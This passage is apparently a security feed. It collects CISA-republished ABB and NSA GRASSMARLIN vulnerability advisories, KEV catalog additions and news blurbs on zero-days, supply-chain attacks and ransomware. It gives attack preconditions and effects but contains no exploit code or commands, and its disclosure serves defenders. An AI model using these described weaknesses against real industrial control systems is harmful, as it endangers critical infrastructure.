CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

Revision History
Initial Release Date: 2026-04-30
2026-04-30, Revision 1: Initial Republication of ABB PSIRT 7PAA022088

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-41940 WebPros cPanel & WHM and WP2 (WordPress Squared) Missing Authentication for Critical Function Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

ABB Ability Symphony Plus Engineering

Summary
ABB became aware of vulnerabilities in the product versions listed as affected in the advisory. The ABB S+ Engineering product versions are affected by vulnerabilities in PostgreSQL version 13.11 and earlier versions. If an attacker gains access to a site's S+ Client Server network, they could exploit such vulnerabilities by executing arbitrary code and potentially compromising the entire system. The following versions of ABB Ability Symphony Plus Engineering are affected: Ability Symphony Plus 2.2, 2.3, 2.3_RU1, 2.3_RU2, 2.3_RU3, 2.4, 2.4_SP1, 2.4_SP2, 2.4_SP2_RU1

CVSS v3: 8.8
Vendor: ABB
Equipment: ABB Ability Symphony Plus Engineering
Vulnerabilities: Integer Overflow or Wraparound; Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'); Time-of-check Time-of-use (TOCTOU) Race Condition; Privilege Dropping / Lowering Errors

Background
Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2023-5869
An attacker running as an authenticated PostgreSQL user can provide crafted data and trigger an integer overflow because of a missing overflow check. This can enable the execution of arbitrary code in the system.

Affected Products
ABB Ability Symphony Plus Engineering
Vendor: ABB
Product Version: ABB Ability Symphony Plus S+ Engineering 2.2, 2.3, 2.3 RU1, 2.3 RU2, 2.3 RU3, 2.4, 2.4 SP1, 2.4 SP2
Product Status: fixed, known_affected

Remediations
Vendor fix: ABB advises all customers to review their installations to determine if they are using an impacted product as listed above; no further analysis or tools are needed to make this determination. The recommended immediate actions per product are listed below:
- Systems using S+ Engineering 2.2 through 2.4 SP2 should upgrade to S+ Engineering 2.4 SP2 RU1 (released in December 2024) or later.
- End users who are unable to install one of these updates should immediately look to implement the Mitigation and Workarounds listed below, as this will restrict or prevent an attacker's ability to compromise the system.
ABB recommends that customers apply the update at the earliest convenience.
Mitigation: Any exploit of these vulnerabilities would require that the attacker has access to the site's S+ client/server network. Following ABB's recommended security practices, including network architecture and perimeter firewall, are mitigating factors in preventing external access to the S+ client/server network. Refer to section "General security recommendations" for further advice on how to keep your system secure.
Workaround: No workarounds are available. Assess the installation-specific risk based on this advisory. Use the recommendations described under "Mitigating factors" or "Recommended immediate actions".

Relevant CWE: CWE-190 Integer Overflow or Wraparound

Metrics
CVSS Version: 3.1
Base Score: 8.8
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:U/RC:C

CVE-2023-39417
If an administrator has installed Extension scripts and specific data is used inside a quoting construct, an attacker having proper PostgreSQL privileges can execute arbitrary code in the system as the administrator.

Affected Products, Remediations, Mitigation and Workaround: identical to those listed for CVE-2023-5869 above.

Relevant CWE: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Metrics
CVSS Version: 3.1
Base Score: 7.5
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:U/RC:C

CVE-2024-7348
A 'time-of-check time-of-use' (TOCTOU) race condition in PostgreSQL can allow an attacker to easily execute arbitrary SQL functions by leveraging a PostgreSQL utility often executed with high privileges.

Affected Products, Remediations, Mitigation and Workaround: identical to those listed for CVE-2023-5869 above.

Relevant CWE: CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition

Metrics
CVSS Version: 3.1
Base Score: 8.8
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:U/RC:C

CVE-2024-0985
An attacker can provide untrusted materialized views and lure a highly privileged authorized user into inadvertently executing arbitrary SQL functions by refreshing the attacker's materialized view.

Affected Products, Remediations, Mitigation and Workaround: identical to those listed for CVE-2023-5869 above.

Relevant CWE: CWE-271 Privilege Dropping / Lowering Errors

Metrics
CVSS Version: 3.1
Base Score: 8
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H/E:F/RL:U/RC:C

Acknowledgments
ABB Global reported these vulnerabilities to CISA.

Notice
The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Frequently Asked Questions

What is the scope of the vulnerability?
- An attacker who successfully exploited these vulnerabilities could insert and run arbitrary code in the S+ system.

What causes the vulnerability?
- It is caused by several vulnerabilities in the PostgreSQL version 13.11 and earlier component used by the S+ Engineering product (see Affected products).

What might an attacker use the vulnerability to do?
- An attacker who successfully accessed the site's S+ client/server network could cause a denial-of-service situation, corruption of data or unauthorized disclosure of information.

How could an attacker exploit the vulnerability?
- To exploit the PostgreSQL vulnerabilities (see Vulnerability severity and details), an attacker would first have to access the site's S+ client/server network, either remotely (through a wrongly configured or penetrated firewall) or by compromising a local machine and then accessing PostgreSQL. Recommended practices help mitigate such attacks; see section Mitigating Factors above.

Could the vulnerability be exploited remotely?
- Yes, see "How could an attacker exploit the vulnerability?" above. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed.

Can functional safety be affected by an exploit of this vulnerability?
- Functional safety systems are not affected by these vulnerabilities.

What does the update do?
- The S+ Engineering update removes the vulnerability by installing a secure, updated PostgreSQL version.

When this security advisory was issued, had this vulnerability been publicly disclosed?
- Yes, PostgreSQL 13.11 vulnerabilities have been publicly disclosed.

When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited?
- No, ABB had not received any information indicating that S+ Engineering had been exploited when this security advisory was originally issued.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of ABB PSIRT 7PAA017341 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-04-13
2026-04-13, Revision 1: Initial version.
2026-04-30, Revision 2: Initial CISA Republication of ABB PSIRT 7PAA017341 advisory

ABB System 800xA, Symphony Plus IEC 61850

Summary
This vulnerability was privately reported relating to ABB's implementation of the IEC 61850 communication stack for MMS client applications used in some Automation control system products. Note: IEC 61850 communication typically supports MMS and GOOSE protocols. Some ABB products support both, others only MMS (e.g. S+ Operations and PM 877). In any case, GOOSE communication is not impacted by this reported vulnerability. If an attacker gains access to a site's IEC 61850 network, then exploiting this vulnerability will result in a device fault (PM 877, CI850 and CI868 modules) and will require a manual restart. If this attack is directed at an S+ Operations node running IEC 61850 connectivity, this will result in a crash in the IEC 61850 communication driver which, if continued on a repeating basis, will also result in a denial-of-service situation. Note that this does not have an impact on the overall availability and functionality of the S+ Operations node, only the IEC 61850 communication function. The System 800xA IEC61850 Connect is not affected.

The following versions of ABB System 800xA, Symphony Plus IEC 61850 are affected:
Products: AC800M Product line (System 800xA) CI868; Symphony Plus SD Series CI850; Symphony Plus MR (Melody Rack) PM 877; S+ Operations
Firmware/versions: <=6.0.0303.0, <=6.1.0031.0, <=6.1.1004.0, <=6.1.1202.0, <=6.2.0006.0, 6.1.1-3, 7.0, A_0, A_1, A_2.003, A_3.005, A_4.001, B_0.005, C_0, >=3.10|<=3.52, 3.53, 3.3, 2.3, 2.2, 2.1, 3.4

CVSS v3: 6.5
Vendor: ABB
Equipment: ABB System 800xA, Symphony Plus IEC 61850
Vulnerabilities: Improper Validation of Specified Quantity in Input

Background
Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2025-3756
A vulnerability exists in the command handling of the IEC 61850 communication stack included in the product revisions listed above. An attacker with access to IEC 61850 networks could exploit the vulnerability by using a specially crafted 61850 packet, forcing the communication interfaces of the PM 877, CI850 and CI868 modules into fault mode or causing unavailability of the S+ Operations 61850 connectivity, resulting in a denial-of-service situation. The System 800xA IEC61850 Connect is not affected. Note: This vulnerability does not impact the overall availability and functionality of the S+ Operations node, only the 61850 communication function.

Affected Products
ABB System 800xA, Symphony Plus IEC 61850
Vendor: ABB
Product Version:
Product Status: fixed, known_affected

Remediations
Vendor fix: ABB advises all customers to review their installations to determine if they are using an impacted product as listed above; no further analysis or tools are needed to make this determination. The recommended immediate actions per product are listed below:
- CI868 (for AC 800M): Devices with firmware versions reported in Affected products are vulnerable. All the vulnerabilities will be corrected in the 6.1.1 and 7.0 tracks for 800xA. AC 800M 6.1.1-3 is planned for Q2 2027; AC 800M 7.0 was released in December 2025.
- CI850 (for Symphony Plus SD Series): Devices with firmware versions reported in Affected products are vulnerable. All the vulnerabilities will be corrected in version C_0 or later (planned Q2 2026).
- PM 877 (Symphony Plus MR): Devices with firmware versions reported in Affected products are vulnerable. All the vulnerabilities will be corrected with firmware version 3.53 or later (planned Q1 2026).
- S+ Operations: Versions reported in Affected products are vulnerable. All the vulnerabilities will be corrected in version 3.4 or later (released in January 2026).
ABB recommends customers apply updates, as they become available, at their earliest convenience. It is also advisable to review the Mitigating Factors, Workarounds and General security recommendations sections for additional actions which may help reduce overall risk.
Mitigation: The vulnerabilities announced in this Advisory for ABB Process Automation products require that an attacker has access to the system network and hosts, which are generally expected to be protected. Process Control and IEC 61850 networks are NOT recommended to be exposed directly to Internet connections. If these networks are not properly isolated, then connected components may be remotely exploitable as described in this advisory. To exploit the vulnerability, an attacker with remote network access can send a specially crafted packet to the PM 877, CI850 and CI868 modules which causes the fault of these devices. S+ Operations only implements 61850 client services and is therefore not intended to listen to incoming connection requests. However, if a specially crafted message is sent anyway, it can still cause the 61850 communication driver to crash. The usage of a perimeter firewall to allow only legitimate client communications is an effective mitigation. Refer to section "General security recommendations" for further advice on how to keep your system secure.
Workaround: No workarounds are available. Assess the installation-specific risk based on this advisory. Use the recommendations described under "Mitigating factors" or "Recommended immediate actions".

Relevant CWE: CWE-1284 Improper Validation of Specified Quantity in Input

Metrics
CVSS Version: 3.1
Base Score: 6.5
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Acknowledgments
Hitachi Energy reported this vulnerability to ABB Global. ABB Global reported this vulnerability to CISA.

Notice
The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Frequently Asked Questions

What is the scope of the vulnerability?
- An attacker having access to the IEC 61850 network can force the ABB hardware devices to go to 'fault' state by sending a specially crafted 61850 packet. This will result in a denial-of-service situation affecting the primary functionality of the listed devices and requiring a manual reset. In the same way, this vulnerability can cause the unavailability of the S+ Operations 61850 connectivity if continued on a repeating basis (but not of the whole S+ Operations node). The System 800xA IEC61850 Connect is not affected.

What causes the vulnerability?
- The vulnerability is caused by a weakness in the message processing in the IEC 61850 communication stack.

What is CI868?
- CI868 is a module used in the AC800M product line (System 800xA) for IEC 61850 communication.

What is CI850?
- CI850 is a module used in the Symphony Plus SD Series product line for IEC 61850 communication.

What is PM 877?
- PM 877 is a controller used in the Symphony Plus MR (Melody Rack) product line for IEC 61850 communication.

What is S+ Operations?
- S+ Operations is the Human Machine Interface for supervision and control of Symphony based control or SCADA systems. It is a module used in AC800M product line (System 800xA) for IEC 61850 communication. What might an attacker use the vulnerability to do? - An attacker with access to IEC 61850 networks could exploit the vulnerability by sending a specially crafted 61850 packet to the S+ products, forcing the Communication Interfaces to fault modes or causing unavailability of the S+ Operations 61850 connectivity, resulting in a denial-of-service situation. How could an attacker exploit the vulnerability? - An attacker could try to exploit the vulnerability by creating a specially crafted message and sending the message to an affected system node. This would require that the attacker has access to the system network, by connecting to the network either directly or through a wrongly configured or penetrated firewall, or that he installs malicious software on a system node or otherwise infects the net-work with malicious software. Recommended practices help mitigate such attacks, see section Mitigating Factors. Could the vulnerability be exploited remotely? - Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. Can functional safety be affected by an exploit of this vulnerability? - Functional safety systems are not affected by these vulnerabilities. What does the update do? - The update removes the vulnerability by modifying the way that the IEC 61850 stack, used by the ABB Process Automation Products described above, manages 61850 incoming messages. When this security advisory was issued, had this vulnerability been publicly disclosed? 
- No, ABB received information about this vulnerability through responsible disclosure. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? - No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. 
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 7PAA020125 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-13 Date Revision Summary 2026-04-13 1 Initial version. 2026-04-30 2 Initial CISA Republication of ABB PSIRT 7PAA020125 advisory Legal Notice and Terms of Use

Introducing AIMap: Security Testing For AI Agent Infrastructure

Attackers can already find, connect to, and probe your exposed AI agent infrastructure. AIMap gives defenders that same visibility. Built by Bishop Fox, this open-source tool discovers, scores, and tests exposed AI endpoints so you can understand your real attack surface before someone else does.

Crypto hack losses top $630M in April, highest since February 2025

Losses from crypto hacks have topped $630 million in April across more than 25 hacks, with DeFi dominating major incidents and exploits accelerating despite security updates.

Critical cPanel and WHM bug exploited as a zero-day, PoC now available

The critical CVE-2026-41940 authentication bypass vulnerability in cPanel, WHM, and WP Squared is being actively exploited in the wild and has been leveraged in attempts since late February. [...]

US, UAE and China joint effort dismantles 9 crypto scam centers

In another police action, European police arrested 10 people and took down three scam centers, estimated to have stolen over $58 million from victims around the world.

Claude Mythos Fears Startle Japan's Financial Services Sector

Global financial institutions are panicked over Anthropic's new superhacker AI model. Cyber experts aren't quite as worried.

Satya Nadella says he’s ready to ‘exploit’ the new OpenAI deal

Microsoft gets to offer OpenAI's tech to its cloud customers and doesn't have to pay for it. "We fully plan to exploit it," Nadella said.

Official SAP npm packages compromised to steal credentials

Multiple official SAP npm packages were compromised in what is believed to be a TeamPCP supply-chain attack to steal credentials and authentication tokens from developers' systems. [...]

Hackers exploit RCE flaws in Qinglong task scheduler for cryptomining

Hackers are exploiting two authentication bypass vulnerabilities in the Qinglong open-source task scheduling tool to deploy cryptominers on developers' servers. [...]

Reverse Engineering With AI Unearths High-Severity GitHub Bug

Wiz used an AI reverse-engineering tool to pinpoint a vulnerability that previously would have been too costly and time-consuming to undertake.

AI Finds 38 Security Flaws in Electronic Health Record Platform

Flaws in OpenEMR's platform — used by more than 100,000 healthcare providers — enabled database compromise, remote code execution, and data theft.

Hackers arrested for hijacking and selling 610,000 Roblox accounts

The Ukrainian police have arrested three individuals who hacked more than 610,000 Roblox gaming accounts and sold them for a profit of $225,000. [...]

cPanel, WHM emergency update fixes critical auth bypass bug

A critical vulnerability affecting all but the latest versions of cPanel and the WebHost Manager (WHM) dashboard could be exploited to obtain access to the control panel without authentication. [...]

Vect 2.0 Ransomware Acts as Wiper, Thanks to Design Error

The emerging ransomware has been deployed against victims of the TeamPCP supply chain attacks, but organizations should think twice before paying for a decryptor.

Sri Lanka discloses another missing payment, days after hackers stole $2.5M from its finance ministry

The government of Sri Lanka has lost more than $3 million in two recent, separate cybersecurity incidents as the country continues to recover from its 2022 debt crisis.

Learning from the Vercel breach: Shadow AI & OAuth sprawl

A single third-party OAuth integration can become a direct path into your environment. Push explains how the Vercel breach shows a compromised OAuth app can lead to widespread impact across downstream customers. [...]

Lotus Wiper Attack Targets Venezuelan Energy Firms, Utilities

An analysis of the destructive malware reveals sophisticated living-off-the-land (LotL) techniques and detailed strategies for the widespread deletion of data.

GitHub fixes RCE flaw that gave access to millions of private repos

In early March, GitHub patched a critical remote code execution vulnerability (CVE-2026-3854) that could have allowed attackers to access millions of private repositories. [...]

ZetaChain dismissed bug report that could have prevented $334K exploit

The vulnerability behind ZetaChain's $334,000 exploit had been reported through its bug bounty program before the attack but was dismissed.

Adapting Zero Trust Principles to Operational Technology

CISA, in coordination with the Department of War, Department of Energy, Federal Bureau of Investigation, and Department of State, released Adapting Zero Trust Principles to Operational Technology, joint guidance for organizations applying zero trust (ZT) principles to operational technology (OT). Zero trust is a modern, adaptive approach to cybersecurity that eliminates implicit trust and requires continuously validating access based on identity, context, and risk.

With advancements in technology, OT systems that were traditionally isolated or manually operated are now increasingly interconnected, digitally monitored, and remotely controlled. This IT-OT convergence introduces new cybersecurity risks that make perimeter-based defenses and implicit trust models inadequate for safeguarding OT systems and the critical physical processes they control.

This guidance supports OT owners and operators in addressing the unique challenges of transitioning to a ZT architecture, considering technology gaps from legacy infrastructure, operational constraints, and safety requirements. It focuses on establishing comprehensive asset visibility, proactively addressing supply chain risks, and implementing robust identity and access management while stressing the importance of layered security measures—including network segmentation, secure communication protocols, and vulnerability management.

To learn more about ZT principles, visit Zero Trust.

CISA orders feds to patch Windows flaw exploited as zero-day

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to secure their Windows systems against a vulnerability exploited in zero-day attacks. [...]

Polymarket denies data breach, says hacker is selling public data

The apparent hacker claimed to have breached other prediction markets and planned to release the data in the next few days.

BlueNoroff Uses Fake Zoom Calls to Turn Victims Into Attack Lures

The North Korean group is using stolen victim videos, AI-generated avatars, and fake Zoom calls to scale malware attacks against cryptocurrency executives.

Broken VECT 2.0 ransomware acts as a data wiper for large files

Researchers are warning that the VECT 2.0 ransomware has a problem in the way it handles encryption nonces that leads to permanently destroying larger files rather than encrypting them. [...]

Hackers are exploiting a critical LiteLLM pre-auth SQLi flaw

Hackers are targeting sensitive information stored in the LiteLLM open-source large-language model (LLM) gateway by exploiting a critical vulnerability tracked as CVE-2026-42208. [...]

NSA Chief During Snowden Affair Shares Regrets, Reflections 13 Years Later

Chris Inglis was the head civilian in charge at the NSA when the Snowden leaks exploded. He gets candid about mistakes the organization made, and what CISOs need to know about spotting potential threats, media disclosures, and "enculturation."

Feuding Ransomware Groups Leak Each Other's Data

When 0APT and KryBit attacked each other, they exposed infrastructure and operational data, giving defenders rare insight into ransomware operations.

Vidar Rises to Top of Chaotic Infostealer Market

The malware has filled the gap created by last year's law enforcement takedowns of Lumma and Rhadamanthys.

Video service Vimeo confirms Anodot breach exposed user data

Vimeo has disclosed that data belonging to some of its customers and users has been accessed without authorization following the recent breach at the Anodot data anomaly detection company. [...]

Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution. Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Mozilla Thunderbird is an email client. Mozilla Thunderbird ESR is a version of the email client intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Oracle Quarterly Critical Patches Issued April 21, 2026

Multiple vulnerabilities have been discovered in Oracle products, the most severe of which could allow for remote code execution. Successful exploitation of the most severe of these vulnerabilities could result in an attacker gaining the same privileges as the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

A Vulnerability in OpenSSH Could Allow for Authentication Bypass

A vulnerability has been discovered in OpenSSH which could allow for authentication bypass. OpenSSH (Open Secure Shell) is an open-source suite of secure networking utilities based on the SSH protocol. It provides encrypted communication sessions over unsecured networks in a client-server architecture, primarily used for remote login and secure file transfers. Successful exploitation of the vulnerability could provide an attacker with root access to all the servers an organization has, if the vulnerable protocol runs on them.

US reportedly charges Scattered Spider hacker arrested in Finland

A 19-year-old dual United States and Estonian citizen arrested in Finland earlier this month faces federal charges in the U.S. alleging he was a prolific member of the notorious Scattered Spider hacking collective. [...]

Fresh Wave of GlassWorm VS Code Extensions Slices Through Supply Chain

Attackers continue to scale a campaign to seed Open VSX with seemingly benign VS Code extensions that spread self-propagating malware.

Checkmarx confirms LAPSUS$ hackers leaked its stolen GitHub data

Application security company Checkmarx has confirmed that the LAPSUS$ threat group leaked data stolen from its private GitHub repository. [...]

NSA GRASSMARLIN

Summary

Successful exploitation of this vulnerability could allow an attacker to disclose sensitive information.

The following versions of NSA GRASSMARLIN are affected:
- GRASSMARLIN vers:all/*

CVSS v3: 5.5
Vendor: NSA
Equipment: NSA GRASSMARLIN
Vulnerabilities: Improper Restriction of XML External Entity Reference

Background

Critical Infrastructure Sectors: Information Technology
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerabilities

CVE-2026-6807
A vulnerability in GRASSMARLIN v3.2.1 allows crafted session data to trigger improper handling of XML input, which may result in unintended exposure of sensitive information. The flaw stems from insufficient hardening of the XML parsing process.

Affected Products

NSA GRASSMARLIN
Vendor: NSA
Product Version: NSA GRASSMARLIN: vers:all/*
Product Status: known_affected

Remediations

Vendor fix: NSA has indicated that the GRASSMARLIN project has reached end-of-life status as of 2017 and is no longer supported. The project is archived, and no patches or further updates are planned or expected.

Relevant CWE: CWE-611 Improper Restriction of XML External Entity Reference

Metrics

CVSS Version: 3.1
Base Score: 5.5
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Acknowledgments

Grady DeRosa reported this vulnerability to CISA.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability.
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History

Initial Release Date: 2026-04-28
- 2026-04-28, Revision 1: Initial Publication.

CISA Adds Two Known Exploited Vulnerabilities to Catalog

CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
- CVE-2024-1708 ConnectWise ScreenConnect Path Traversal Vulnerability
- CVE-2026-32202 Microsoft Windows Protection Mechanism Failure Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

UNC6692 Combines Social Engineering, Malware, Cloud Abuse

A newly discovered threat actor is using Microsoft Teams, AWS S3 buckets, and custom "Snow" malware in a multipronged campaign.

Unpatched 'PhantomRPC' Flaw in Windows Enables Privilege Escalation

A researcher discovered five different exploit paths that stem from an architectural weakness in how Windows' Remote Procedure Call (RPC) mechanism handles connections to unavailable services.

20-Year-Old Malware Rewrites History of Cyber Sabotage

Researchers have uncovered a malware framework dubbed "fast16" that predates Stuxnet by five years.

Parsing Agentic Offensive Security's Existential Threat

Some fear frontier LLMs like Claude Mythos and OpenAI's GPT-5.5 will lead to cybersecurity annihilation. Ari Herbert-Voss notes this could be an opportunity.

Glasswing Secured the Code. The Rest of Your Stack Is Still on You

Forgotten integrations, shadow IT, SaaS, and now shadow AI and agents are everywhere, and attackers don't need sophisticated AI models to take advantage.

AI Phishing Is No. 1 With a Bullet for Cyberattackers

In the past six months, companies have seen a significant influx of AI-powered phishing, as cyberattackers progress from small campaigns to 1-to-1 personalized attacks.

North Korea's Lazarus Targets macOS Users via ClickFix

